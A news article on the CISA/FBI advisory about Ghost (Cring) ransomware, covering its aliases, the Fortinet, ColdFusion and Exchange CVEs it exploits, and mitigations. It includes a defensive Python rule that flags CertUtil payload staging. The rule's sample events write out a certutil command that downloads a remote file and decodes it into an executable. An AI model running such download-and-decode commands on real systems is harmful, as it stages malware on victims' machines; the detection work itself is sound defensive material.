The Cybersecurity and Infrastructure Security Agency (CISA) and the FBI warned about the widespread impact of Ghost ransomware, which has breached victims across more than 70 countries.
The targeted sectors include critical infrastructure, healthcare, government, education, technology, manufacturing, and small-to-medium-sized businesses.
According to a joint advisory released by CISA, the FBI, and the Multi-State Information Sharing and Analysis Center (MS-ISAC), Ghost ransomware actors have been exploiting outdated software and firmware since early 2021. These attacks have compromised a wide range of organizations, including entities in China.
Evolving Tactics and Attribution Challenges
Ghost ransomware operators frequently alter their malware executables, modify encrypted file extensions, update ransom note contents, and use multiple email addresses for ransom negotiations. This fluid approach has made it difficult to attribute attacks to a single group with certainty.
Several aliases associated with Ghost ransomware include Ghost, Cring, Crypt3r, Phantom, Strike, Hello, Wickrme, HsHarada, and Rapture. Malware samples linked to these attacks include Cring.exe, Ghost.exe, ElysiumO.exe, and Locker.exe. The group primarily exploits known vulnerabilities in unpatched systems, such as those in Fortinet (CVE-2018-13379), ColdFusion (CVE-2010-2861, CVE-2009-3960), and Microsoft Exchange (CVE-2021-34473, CVE-2021-34523, CVE-2021-31207).
How to Protect Against Ghost Ransomware
To mitigate the risks posed by Ghost ransomware, security experts recommend taking the following precautions:
- Regularly back up systems and store the backups offline, where ransomware running on the network cannot reach and encrypt them.
- Apply patches to operating systems, software, and firmware without delay.
- Prioritize fixes for vulnerabilities exploited by Ghost ransomware.
- Segment networks to minimize the spread of infections.
- Implement phishing-resistant multi-factor authentication (MFA) for privileged accounts and email services.
How Ghost Ransomware Operates
Ghost ransomware was first detected in early 2021 by Amigo_A and Swisscom’s CSIRT team. The attackers initially used custom Mimikatz samples, followed by CobaltStrike beacons, and deployed ransomware payloads through Windows CertUtil, a legitimate certificate management tool, to evade security defenses.
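Because the advisory singles out Windows CertUtil as the tool used to stage payloads, a defender's first detection is usually a rule over process-creation telemetry. The following is an added example, not code from the advisory or this article: it assumes process-creation events have already been parsed into dictionaries with host, user, image and cmdline fields, and the sample events are constructed for illustration.

```python
import re

# Constructed process-creation records (the shape a parsed Sysmon Event ID 1
# or Windows 4688 event might take). These are not real telemetry.
SAMPLE_EVENTS = [
    {"host": "WS-17", "user": "CORP\\jdoe", "image": r"C:\Windows\System32\certutil.exe",
     "cmdline": "certutil.exe -urlcache -split -f http://203.0.113.5/update.bin C:\\Users\\Public\\update.bin"},
    {"host": "WS-17", "user": "CORP\\jdoe", "image": r"C:\Windows\System32\certutil.exe",
     "cmdline": "certutil.exe -decode C:\\Users\\Public\\update.bin C:\\Users\\Public\\svc.exe"},
    {"host": "DC-01", "user": "CORP\\admin", "image": r"C:\Windows\System32\certutil.exe",
     "cmdline": "certutil.exe -verify C:\\certs\\webserver.cer"},
    {"host": "WS-22", "user": "CORP\\asmith", "image": r"C:\Windows\System32\certutil.exe",
     "cmdline": "certutil -store My"},
]

# -urlcache followed by a URL: certutil fetching a remote file (ATT&CK T1105).
URLCACHE = re.compile(r"-urlcache\b.*https?://", re.IGNORECASE)
# -decode / -decodehex: base64/hex decoding of a staged file (ATT&CK T1140).
DECODE = re.compile(r"-decode(hex)?\b", re.IGNORECASE)


def classify_certutil(cmdline):
    """Return the ATT&CK technique ID suggested by a certutil command line, or None
    for ordinary certificate-management use (-verify, -store, ...)."""
    if URLCACHE.search(cmdline):
        return "T1105"
    if DECODE.search(cmdline):
        return "T1140"
    return None


def detect_certutil_abuse(events):
    """Flag certutil process-creation events that look like payload staging.
    A host showing more than one suspicious invocation (download then decode,
    the pattern described for Ghost) is escalated from 'medium' to 'high'."""
    alerts, per_host = [], {}
    for ev in events:
        if not ev["image"].lower().endswith("certutil.exe"):
            continue
        technique = classify_certutil(ev["cmdline"])
        if technique is None:
            continue
        per_host.setdefault(ev["host"], []).append(technique)
        alerts.append({"host": ev["host"], "user": ev["user"], "technique": technique,
                       "cmdline": ev["cmdline"], "severity": "medium"})
    for alert in alerts:
        if len(per_host[alert["host"]]) >= 2:
            alert["severity"] = "high"
    return alerts
```

Running detect_certutil_abuse(SAMPLE_EVENTS) flags only the two WS-17 events and escalates both to high, while the legitimate -verify and -store invocations produce no alert.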
Beyond ransomware attacks, state-backed hacking groups have also been observed exploiting the Fortinet SSL VPN vulnerability (CVE-2018-13379). This flaw has been used to gain unauthorized access to critical systems, including U.S. election support infrastructure.
Despite multiple warnings from Fortinet in 2019, 2020, and 2021 urging customers to patch their SSL VPN appliances, many organizations remain vulnerable.
The latest advisory from CISA, the FBI, and MS-ISAC provides additional details on indicators of compromise (IOCs), tactics, techniques, and procedures (TTPs), and detection methods observed in Ghost ransomware campaigns, including those investigated as recently as January 2025.
Bijay Pokharel